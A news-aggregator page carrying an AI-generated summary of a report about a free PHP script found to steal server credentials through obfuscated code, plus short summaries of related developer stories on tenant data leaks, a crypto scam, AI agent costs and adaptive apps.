SShortSingh.
Back to feed

Free PHP Scripts on Forums Found Stealing Server Credentials and Sensitive Data

0
·1 views

A developer discovered that a free PHP script downloaded from platforms like 4shared and online forums contained hidden malicious code. The script silently collected and transmitted sensitive server data — including email credentials, usernames, passwords, and environment details — to an external destination without the user's knowledge. The malicious code used obfuscation techniques such as base64 encoding and dynamic execution functions to disguise its true purpose and evade casual inspection. The incident highlights the risks of using unverified third-party code, particularly free scripts shared outside reputable platforms. Security experts recommend auditing all third-party code for suspicious functions like eval() and base64_decode() before deploying it in any production environment.

Read the full story at DEV Community

This is an AI-generated summary. ShortSingh links to the original source for the complete article.

Discussion (0)

Log in to join the discussion and vote.

Log in

Related stories

0
ProgrammingDEV Community ·

React 19 useCallback Stale Closures Can Leak Tenant Data in Multi-Tenant Apps

A developer shipping a multi-tenant AI dashboard discovered that React 19's useCallback memoization can cause stale closures that leak one tenant's data into another tenant's API calls. The bug surfaced in production when rapid tenant switches occurred while async AI requests were still in-flight, resulting in Tenant B's Claude API calls inadvertently using Tenant A's system prompts. Although the dependency array correctly lists tenantId, it only guards against stale values at render time and cannot cancel or correct closures already captured during ongoing async operations. The issue is particularly hard to catch because it leaves no TypeScript errors, no failed requests, and no visible staging-environment symptoms. In SaaS applications, this silent timing flaw constitutes a data isolation violation that can affect hundreds of tenant accounts concurrently.

0
ProgrammingDEV Community ·

Lightchain.ai Flagged as Fraudulent Platform After User Loses $4,321

A user reported losing $4,321.95 on Lightchain.ai after a withdrawal attempt failed and their account balance disappeared. The platform is alleged to be an exit scam that uses fake AI trading bots and malicious smart contracts to block withdrawals. Victims are reportedly pressured into paying fabricated 'upgrade' or 'tax' fees under the false promise of unlocking their funds, but payments yield no results. Security experts warn that any additional fees paid to such platforms only benefit the scammers, who continue to invent new reasons to withhold payouts. Affected users are advised to report incidents to the FBI's Internet Crime Complaint Center at ic3.gov and to avoid unverified third-party recovery services.

0
ProgrammingDEV Community ·

Missing one config line cost a solo dev over $600 in excess AI agent spend

A solo developer auditing 34 days and roughly 26,000 traces of AI agent usage discovered that 22.6% of model-routing decisions deviated from his intended policy, amounting to $1,248 in excess list-price spend. The single largest cost cluster — $657 — stemmed from a missing 'model:' line in subagent definition files, which caused cheaper mechanical tasks to silently inherit and run on the more expensive parent model. He also found that live session logs from Claude Code rewrite themselves over time, meaning usage dashboards built on those files can drift; an append-only immutable snapshot resolved the discrepancy. An attempted quality comparison between expensive and cheaper model outputs was inconclusive due to methodological flaws, including context mismatch and self-recognition bias during blind judging. The developer published the full audit, including its failures, as part of an open instrumentation SDK called traceguard, designed to track model usage locally without sending data externally.

0
ProgrammingDEV Community ·

Why Most 'Adaptive' Apps Are Just If-Else Logic in Disguise

Many apps marketed as adaptive or personalized rely on simple heuristics — showing harder content after a correct answer and easier content after a wrong one — rather than true adaptive logic. A genuinely adaptive system maintains a continuously updated model of a hidden user variable, such as ability or preference, treating each new action as evidence rather than a standalone trigger. A developer building an exam prep platform identified three essential components for real adaptivity: estimating hidden user state from behavior, selecting the next input calibrated to that estimate, and maintaining a pipeline that keeps generating relevant content. Without all three working together, even a sophisticated statistical model cannot deliver meaningful personalization. The distinction matters because thin underlying models produce unstable, noisy, and non-generalizable experiences regardless of how they are marketed.

Free PHP Scripts on Forums Found Stealing Server Credentials and Sensitive Data · ShortSingh